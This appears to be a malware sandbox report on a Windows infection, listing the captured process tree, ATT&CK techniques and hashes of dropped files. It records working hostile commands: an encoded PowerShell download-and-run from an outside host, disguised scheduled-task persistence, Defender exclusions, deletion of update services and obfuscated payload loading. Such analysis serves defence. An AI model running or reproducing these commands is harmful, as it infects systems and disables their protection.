AHQARABlAGYAUgB1AG4ALgBlAHgAZQAnACkAKQA8ACMAcAB4AHgAIwA+ADsAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwADoALwAvAGMAbwBuAG4AZQBjAHQAMgBtAGUALgBoAG8AcAB0AG8ALgBvAHIAZwAvAHcAbwB3AC8AMQAvADIALwAzAC8ANAAvADUALwA2AC8ANwAvAFMAeQBzAEEAcABwAC4AZQB4AGUAJwAsACAAPAAjAGQAawBjACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAcQBkAGQAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAdwB5AHoAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAUwB5AHMAQQBwAHAALgBlAHgAZQAnACkAKQA8ACMAZgBmAHgAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAYwBuAHEAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHkAdwBwACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAG4AZQB3ADIALgBlAHgAZQAnACkAPAAjAHcAaABrACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAHkAagB0ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBhAHgAagAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBDADQATABvAGEAZABlAHIALgBlAHgAZQAnACkAPAAjAHIAawBrACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAGEAdQB6ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBnAHUAaQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBTAG0AYQByAHQARABlAGYAUgB1AG4ALgBlAHgAZQAnACkAPAAjAG0AegBrACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAGEAegB0ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwB3AHUAbAAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBTAHkAcwBBAHAAcAAuAGUAeABlACcAKQA8ACMAcwBhAGcAIwA+AA=="
4⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1456

C:\Users\Admin\AppData\Local\Temp\new2.exe
"C:\Users\Admin\AppData\Local\Temp\new2.exe"
5⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1624

C:\Windows\System32\Wbem\wmic.exe
wmic os get Caption
6⤵
- Suspicious use of AdjustPrivilegeToken
PID:744

C:\Windows\system32\cmd.exe
cmd /C "wmic path win32_VideoController get name"
6⤵
- Suspicious use of WriteProcessMemory
PID:868

C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
7⤵
- Suspicious use of AdjustPrivilegeToken
PID:1568

C:\Windows\system32\cmd.exe
cmd /C "wmic cpu get name"
6⤵
- Suspicious use of WriteProcessMemory
PID:980

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get name
7⤵
PID:2004

C:\Users\Admin\AppData\Local\Temp\C4Loader.exe
"C:\Users\Admin\AppData\Local\Temp\C4Loader.exe"
5⤵
- Executes dropped EXE
PID:1824

C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" https://cheat4.biz/index.php?do=register
6⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:1964

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1964 CREDAT:275457 /prefetch:2
7⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:832

C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe
"C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe"
5⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
PID:1248

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#thpqznhs#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'WindowsDefenderSmartScreenQC' /tr '''C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'WindowsDefenderSmartScreenQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderSmartScreenQC" /t REG_SZ /f /d 'C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe' }
6⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
PID:540

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn WindowsDefenderSmartScreenQC /tr "'C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe'"
7⤵
- Creates scheduled task(s)
PID:1692

C:\Users\Admin\AppData\Local\Temp\SysApp.exe
"C:\Users\Admin\AppData\Local\Temp\SysApp.exe"
5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:872

C:\Windows\SysWOW64\schtasks.exe
/C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe"
6⤵
- Creates scheduled task(s)
PID:912

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1136 -s 48
3⤵
- Program crash
PID:1696

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
PID:1236

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
2⤵
- Suspicious use of WriteProcessMemory
PID:1892

C:\Windows\System32\sc.exe
sc stop UsoSvc
3⤵
- Launches sc.exe
PID:1420

C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
3⤵
- Launches sc.exe
PID:564

C:\Windows\System32\sc.exe
sc stop wuauserv
3⤵
- Launches sc.exe
PID:624

C:\Windows\System32\sc.exe
sc stop bits
3⤵
- Launches sc.exe
PID:1168

C:\Windows\System32\sc.exe
sc stop dosvc
3⤵
- Launches sc.exe
PID:1984

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
3⤵
PID:1588

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
3⤵
PID:744

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
3⤵
- Modifies security service
PID:912

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
3⤵
PID:520

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
3⤵
PID:268

C:\Windows\System32\dialer.exe
C:\Windows\System32\dialer.exe
2⤵
PID:980

C:\Windows\system32\taskeng.exe
taskeng.exe {16EF09EA-9CA5-4D74-A43C-83561404ED77} S-1-5-18:NT AUTHORITY\System:Service:
1⤵
PID:1436

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE "[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+'O'+''+[Char](70)+''+[Char](84)+''+'W'+''+'A'+''+[Char](82)+''+'E'+'').GetValue(''+'d'+''+[Char](105)+''+[Char](97)+''+'l'+''+[Char](101)+''+[Char](114)+''+[Char](115)+'t'+[Char](97)+''+'g'+''+'e'+'r')).EntryPoint.Invoke($Null,$Null)
2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:1512

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+[Char](70)+''+[Char](84)+''+'W'+''+[Char](65)+''+'R'+''+'E'+'').GetValue(''+[Char](100)+''+[Char](105)+'a'+'l'+''+'e'+'r'+'s'+''+'t'+''+[Char](97)+''+'g'+''+[Char](101)+'r')).EntryPoint.Invoke($Null,$Null)
2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
PID:284

C:\Windows\system32\taskeng.exe
taskeng.exe {C2AB98DE-BE1F-4729-8E96-DB3578560BE1} S-1-5-21-3430344531-3702557399-3004411149-1000:WFSTZEPN\Admin:Interactive:[1]
1⤵
PID:768

C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe
C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe
2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:1880

C:\Windows\SysWOW64\schtasks.exe
/C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe"
3⤵
- Creates scheduled task(s)
PID:2220

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Scripting

T1064

Persistence

Modify Existing Service

T1031

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Impair Defenses

Modify Registry

Scripting

Web Service

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_8E367579E3D17004320AD51DAC7419D5
Filesize
472B

MD5
a23c02395db35b23415f9166f0bf1ef7

SHA1
48493c7a9f3e53bba12610e18b6af6830402d9bf

SHA256
0fb0e3186d0e703f1c5e85076234c223b186ffca73b97b8fbefccaf15d679081

SHA512
105ee74ad377ee3022b41bf66ef8d2a90927dfa7cba3be640c849d9b7f0b3090f91ac42faab7f5373f4e03723d5738f9d29bed0afb4b2755e825683787fe6b7f

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA
Filesize
410B

MD5
d44b149a6460b864ad0db03f2b6482e8

SHA1
28cdbc5813e30fe7872126351688d615b0fd957c

SHA256
737831d0d5a19b78699f3cf1aa4a245cb8b1cb87c0a67f0c037dd5bea022d261

SHA512
94d15980ca770f839728c7cfabb0a62665fd41397160fc13d80003e3315dc195dc5dcbf628dc3aec8bb4b07fb7880113f373846db4e4556c34359b8421c5a761

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize
342B

MD5
e661630bec6e5ff52d10a89f8ddf6ff4

SHA1
9911f0e58d92f3b8cdbc4ac21a1c053126adf79b

SHA256
5a494004eb35986e229f4f510367bbd7897c3656680c9141b055815e63fe674b

SHA512
6b6411a79d256b4695b99842ee36689fd60e5d66c7b7acb56ebdb241a2739429946d018b7eab7fada1941177d6dc685a0d0028ee8efb21fef41aa506eedfb697

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize
342B

MD5
ff238a9a47e7abb5aa154f108177efb7

SHA1
d02fab65500591f5c2ba92c5b629f8506b99e98e

SHA256
e4814ce623289ef4dbf6fbe5b5817e41b15c3735d4659655fe446b6384923d09

SHA512
276b593492c893413c84da8bb00bf2afc20672cfc1d97dde61998c61df5a3a38e2c9c19311431b74f7ff6900954b78ba62f07f435b83a30c048179c407c0115c

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize
342B

MD5
f56049fd2a9375940df89081ce08204d

SHA1
4249c2eaef8d49829470171510341f9039750e6c

SHA256
ea9b68e8800b20cccefed5e531add4f58b07616ad32b74bc2e8d41987838acd6

SHA512
801a0273991973bd2e54634c80563ba0ef8ae79c287f010a1a992cfc0d035a4bf0e1919bbf28c16b78314e46bd4dbbaa5f20bfb119c71390493465e2c7809087

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize
342B

MD5
ce0fa91a86c69250e193ac3b11ce6144

SHA1
d8084ffed2ca2cbae67ef1409a851d409a285aa8

SHA256
868233333f63a593b5ed8d93a6949056306b6bb6bdc61376baa4b3b90bec7af3

SHA512
aa9dc091575076853e8c624ebb50198577c69b2ac8dee35ab934e298bc98de8054bbc36b1e0c090241d26e1ad2a5dd412324f8e286c3a27a7f968c5fa1523e71

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize
342B

MD5
1cd9d9e983ecdf15fc778dff5bc14454

SHA1
583c828dfa0fd9ee625860d7c3f0859cf3dabaa7

SHA256
8fdef92b88bf0be0e7f1fcbc5817e45b8bb82a36c4861fe2a3efa593fb9867ce

SHA512
749a7297427ca5060ac4b24df42ab6b66a214cc3baadbe715f6a65c50d91ae87d47e9131fd69aed1578534af2f54bcbae63767e8222702765932625c9d261c87

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize
342B

MD5
e5323648322cb01b33c3de2e1b082390

SHA1
119f755811567445aa9d14c3775db187e6493831

SHA256
eea55506a983e3df5e4a23b4a38858e4bcd27a60655eab6f933349b23d3bbbde

SHA512
6d6ea22a0c6bfc5b8eee2b1fb61d97e471e7ce7f4938eeca4b59890df502a8a8d368790d978f187c7b9fee80e27892a709daeabb501149f45391d0dd04276c79

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize
342B

MD5
5d0dbd432fd6a627351519be2f8103a1

SHA1
8be7fd49f1e73e6adf72dcc8817306022014ba6b

SHA256
d8357123b7fa23954f344cc9bfc764fa536b0c26d47ee13508b8ae92722bdecd

SHA512
190f2a520897ed3775ee07253629244ea81c94f44b374548fd9b25cf613175ff21928e16494d59af60f4ea118e10e0cf9915fa9f0714226a6a06823bed99c4fa

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize
342B

MD5
d10b9ec8e033d9198b8a8ade0c09dce6

SHA1
a8c1132b8160e534a164ffe332bd99fb76fab612

SHA256
d68e2e7546efd1ca34528499cad66bd5d9d0ddc5fb90b98bb978f9a47415d6e5

SHA512
d433f1f14cac10a94a0fe184ea109539873ea5f1602669bda5f19b613c99329698b2b815641b8e913d3fd6160ee711fd91fa8878dbd7bec7bb5bc372cd57967c

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize
342B

MD5
54b33dd0592a0f3cdb076ac6580affe1

SHA1
afb30cdc713196c2f2666f7e2c7fd693ce57a63b

SHA256
b0f5caae41c7498b34a83710e2c957d21b6bce4727e4769e69384857e4a88c3a

SHA512
e8f8757d1344d77dc0f2c3491231bfefea8bdeef3cf6fd5236e423aee647111356fdfb6f027709184c34de159b3934b030216ee67ed3f892d8c33d356a014dd8

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize
342B

MD5
a5d2c6dac1957b7886e2b09e54f0f8e4

SHA1
d2b8dd6c84d4a036d21be249a5d24c2442077755

SHA256
621d559a898d55c70f050634f8f566f4ae918f4499e8c0b69d58fd274daf0527

SHA512
8f8c53796b7476ffb365683f46113d0c4736fa277cd5701bcedfc444d49aacc4b614bab088202ac3c22bb93f7191a0364e6ec536bf624a226e6e77dd3d929daf

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA
Filesize
392B

MD5
f3d012cc73538be9c7d776e27579f5b0

SHA1
7cbf2d66f8e5abb6d535fd4d18c417e5b4b7cb13

SHA256
46bae8925ddeeca693b58c8f432c6707a211411c64cb0c54312796b85e6f44d0

SHA512
0d93466ffa095cc7343daea8e546b7259491c02b3d19bb4614f213f9e3fbf7f89d0049b4f104494d06db8e5fafa5432154aa0fe761a2c878510f5418d2261264

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\imagestore\z62wpf5\imagestore.dat
Filesize
45KB

MD5
515f29a3a7c16751adda8e41292a4e1c

SHA1
8350b7b34b8c5179e085ff27330be72cf8fd2394

SHA256
711f41d96c22db115cbec7a862801fb4cf764705a2438c0ed50f7b7bf6e3c444

SHA512
2e134f243781157e12478d40e23961ef76d92a04f2af634b99a00f3c75d4c16040f28f0fb51dc5eb37151cc0e382bfc1c8c6b2cd693f84629e4b54223c6ed34c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\CMIDRLTB\suggestions[1].en-US
Filesize
17KB

MD5
5a34cb996293fde2cb7a4ac89587393a

SHA1
3c96c993500690d1a77873cd62bc639b3a10653f

SHA256
c6a5377cbc07eece33790cfc70572e12c7a48ad8296be25c0cc805a1f384dbad

SHA512
e1b7d0107733f81937415104e70f68b1be6fd0ca65dccf4ff72637943d44278d3a77f704aedff59d2dbc0d56a609b2590c8ec0dd6bc48ab30f1dad0c07a0a3ee

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\KTB503AZ\favicon[1].ico
Filesize
40KB

MD5
4b60c29a42054472e32027837927ca74

SHA1
79a2a8129504e552e963b839a6077463919a43c2

SHA256
63536e25780b8fe91431939c38d26f96defca042b8c0ba587797b693e64a0d7c

SHA512
04ebbc0cf7d36c0f13570ab762be07d0ca8ad7f0e3d3622875e4cf637d33cb14b183bcdb52e4efcedb34dca8ac5e1ba62d1d1fd75fe0c74850c6667b5805f067

Download Submit
C:\Users\Admin\AppData\Local\Temp\C4Loader.exe
Filesize
1.4MB

MD5
bb86a343080f9f4696c250ef31a18d9d

SHA1
43b2193dcb1d56eac73ba88a7b461822074192d6

SHA256
095b49a6a4f0c7535d11e071185fc0e94fb00f1b01730ca583889a70ef7ad7e0

SHA512
24807f80547879d3131be311d738b411e335a9489bbe80649fbfd6b6265852e7e9aec461f5e5f5e4e7ea0239c145a18f9b5e91aa31888227b2b080b75a439560

Download Submit
C:\Users\Admin\AppData\Local\Temp\C4Loader.exe
Filesize
1.4MB

MD5
bb86a343080f9f4696c250ef31a18d9d

SHA1
43b2193dcb1d56eac73ba88a7b461822074192d6

SHA256
095b49a6a4f0c7535d11e071185fc0e94fb00f1b01730ca583889a70ef7ad7e0

SHA512
24807f80547879d3131be311d738b411e335a9489bbe80649fbfd6b6265852e7e9aec461f5e5f5e4e7ea0239c145a18f9b5e91aa31888227b2b080b75a439560

Download Submit
C:\Users\Admin\AppData\Local\Temp\C4Loader.exe
Filesize
1.4MB

MD5
bb86a343080f9f4696c250ef31a18d9d

SHA1
43b2193dcb1d56eac73ba88a7b461822074192d6

SHA256
095b49a6a4f0c7535d11e071185fc0e94fb00f1b01730ca583889a70ef7ad7e0

SHA512
24807f80547879d3131be311d738b411e335a9489bbe80649fbfd6b6265852e7e9aec461f5e5f5e4e7ea0239c145a18f9b5e91aa31888227b2b080b75a439560

Download Submit
C:\Users\Admin\AppData\Local\Temp\CabAD43.tmp
Filesize
61KB

MD5
fc4666cbca561e864e7fdf883a9e6661

SHA1
2f8d6094c7a34bf12ea0bbf0d51ee9c5bb7939a5

SHA256
10f3deb6c452d749a7451b5d065f4c0449737e5ee8a44f4d15844b503141e65b

SHA512
c71f54b571e01f247f072be4bbebdf5d8410b67eb79a61e7e0d9853fe857ab9bd12f53e6af3394b935560178107291fc4be351b27deb388eba90ba949633d57d

Download Submit
C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe
Filesize
3.7MB

MD5
f5c51e7760315ad0f0238d268c03c60e

SHA1
85ebaaa9685634143a72bc82c6e7df87a78eed4c

SHA256
ea42fcee681ec3b06dac54d3da4b866143d68cbaa0dd0e00e7c10ae2a7c9d2aa

SHA512
d3b9ac3bf5467bd25439f2d29457361ac14d1be5b060078a7ef4f78540994679f9fed245d70a4e2a6edbc37b94a042be407ad7fbbd5a95600312946ffb558f35

Download Submit
C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe
Filesize
3.7MB

MD5
f5c51e7760315ad0f0238d268c03c60e

SHA1
85ebaaa9685634143a72bc82c6e7df87a78eed4c

SHA256
ea42fcee681ec3b06dac54d3da4b866143d68cbaa0dd0e00e7c10ae2a7c9d2aa

SHA512
d3b9ac3bf5467bd25439f2d29457361ac14d1be5b060078a7ef4f78540994679f9fed245d70a4e2a6edbc37b94a042be407ad7fbbd5a95600312946ffb558f35

Download Submit
C:\Users\Admin\AppData\Local\Temp\SysApp.exe
Filesize
1.4MB

MD5
b6bbab9f72c88d07b484cc339c475e75

SHA1
f06141cedf2aac3cfac6c997d99c00d8e7c5b4c1

SHA256
dd47342f809e86e447b68827dd3a1e72ea0795b71976ecd6fa242013b767b14f

SHA512
1ee084d4283b7359b5f261337e744adecc6a1e26a18b4d2412e6f53d2b602b5e8538112065d27a536776dedadfd0ec8a276aa977389f21f4491539753a0b9fa5

Download Submit
C:\Users\Admin\AppData\Local\Temp\SysApp.exe
Filesize
1.4MB

MD5
b6bbab9f72c88d07b484cc339c475e75

SHA1
f06141cedf2aac3cfac6c997d99c00d8e7c5b4c1

SHA256
dd47342f809e86e447b68827dd3a1e72ea0795b71976ecd6fa242013b767b14f

SHA512
1ee084d4283b7359b5f261337e744adecc6a1e26a18b4d2412e6f53d2b602b5e8538112065d27a536776dedadfd0ec8a276aa977389f21f4491539753a0b9fa5

Download Submit
C:\Users\Admin\AppData\Local\Temp\SysApp.exe
Filesize
1.4MB

MD5
b6bbab9f72c88d07b484cc339c475e75

SHA1
f06141cedf2aac3cfac6c997d99c00d8e7c5b4c1

SHA256
dd47342f809e86e447b68827dd3a1e72ea0795b71976ecd6fa242013b767b14f

SHA512
1ee084d4283b7359b5f261337e744adecc6a1e26a18b4d2412e6f53d2b602b5e8538112065d27a536776dedadfd0ec8a276aa977389f21f4491539753a0b9fa5

Download Submit
C:\Users\Admin\AppData\Local\Temp\TarAD44.tmp
Filesize
161KB

MD5
73b4b714b42fc9a6aaefd0ae59adb009

SHA1
efdaffd5b0ad21913d22001d91bf6c19ecb4ac41

SHA256
c0cf8cc04c34b5b80a2d86ad0eafb2dd71436f070c86b0321fba0201879625fd

SHA512
73af3c51b15f89237552b1718bef21fd80788fa416bab2cb2e7fb3a60d56249a716eda0d2dd68ab643752272640e7eaaaf57ce64bcb38373ddc3d035fb8d57cd

Download Submit
C:\Users\Admin\AppData\Local\Temp\TeMaPEZQleQYhYzRyWJjPjzpfRFEgmot
Filesize
71KB

MD5
6082dd13ad8102d17f9db9cd07600e97

SHA1
39becc88cea914d843b3c5521038907f2f2f4e71

SHA256
40a3f938c8c1eb929771c444d5f8887c42c7cde6281690e2071a2593ba92e48a

SHA512
b7d5c716b6339b3138492c8b0cf4c9540a8d8224f9d5e72e34ceab442bdfa9c855473bbed68a489851f019461e1b1f9d86baf067be556c67b948c930899d3c1e

Download Submit
C:\Users\Admin\AppData\Local\Temp\new2.exe
Filesize
3.0MB

MD5
50d48404f9b93a16c69aed2e6c585192

SHA1
3f949a4b96bac4f7e1cec881edb5b65295410a1c

SHA256
0a6ed49a01a7c4cad6ea914495d5789b97a9993508fe82ff3232613afb2a0789

SHA512
0e6616e1c537ca77e113184adf6aca8677c6d35d3415bccac5e22aa9735cd0be13ce837ee7583553d4db16700fd77973de711f7c24126a9be6d7525c86fc9774

Download Submit
C:\Users\Admin\AppData\Local\Temp\new2.exe
Filesize
3.0MB

MD5
50d48404f9b93a16c69aed2e6c585192

SHA1
3f949a4b96bac4f7e1cec881edb5b65295410a1c

SHA256
0a6ed49a01a7c4cad6ea914495d5789b97a9993508fe82ff3232613afb2a0789

SHA512
0e6616e1c537ca77e113184adf6aca8677c6d35d3415bccac5e22aa9735cd0be13ce837ee7583553d4db16700fd77973de711f7c24126a9be6d7525c86fc9774

Download Submit
C:\Users\Admin\AppData\Local\Temp\~DFCFC1CA9C05CF81BD.TMP
Filesize
16KB

MD5
4b872f7a6343e3e8c332de68d05593c6

SHA1
dea18bce3e8144acc40c96678704b830704aa913

SHA256
5a776846de8f6117d0f60a3ea025f11a4125a72a9ac63d553887a58aaf7af145

SHA512
f48d3114594ece07ff934be6a86316e2be770e33f2e73e053a29fa3b95493add380d80b5f72aca2be1375d3defc1149f8fd6ab2de92d06cf5171391b3b055e19

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe
Filesize
1.4MB

MD5
b6bbab9f72c88d07b484cc339c475e75

SHA1
f06141cedf2aac3cfac6c997d99c00d8e7c5b4c1

SHA256
dd47342f809e86e447b68827dd3a1e72ea0795b71976ecd6fa242013b767b14f

SHA512
1ee084d4283b7359b5f261337e744adecc6a1e26a18b4d2412e6f53d2b602b5e8538112065d27a536776dedadfd0ec8a276aa977389f21f4491539753a0b9fa5

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe
Filesize
1.4MB

MD5
b6bbab9f72c88d07b484cc339c475e75

SHA1
f06141cedf2aac3cfac6c997d99c00d8e7c5b4c1

SHA256
dd47342f809e86e447b68827dd3a1e72ea0795b71976ecd6fa242013b767b14f

SHA512
1ee084d4283b7359b5f261337e744adecc6a1e26a18b4d2412e6f53d2b602b5e8538112065d27a536776dedadfd0ec8a276aa977389f21f4491539753a0b9fa5

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\R1NL7SFW.txt
Filesize
595B

MD5
fe937594e5ed94893ea8c81a8f32ebfa

SHA1
2c3b48be0e25881b206620b2777f82b5e3d8bd22

SHA256
be890e68803e2409db673d7c8722a2842e401f54dc6aed1d2e246b2ab6de8835

SHA512
7ae8844de30165f689fc566cfb4ac4fe943ca0a522acf35241abe7c0095afe37fe098002e1ba17397770916b3d6194501f9877ca24f5a966c564bb4a33214306

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize
7KB

MD5
4e05f54d7e8f18debeb62cf4c85f6b80

SHA1
fdff131d40fdb012f63d1739efa7d99b6d81f50d

SHA256
a5f93f73fa8cee9cbe7a3232eb6f177caa4f3e9cceda0d9d478d35c5842615f6

SHA512
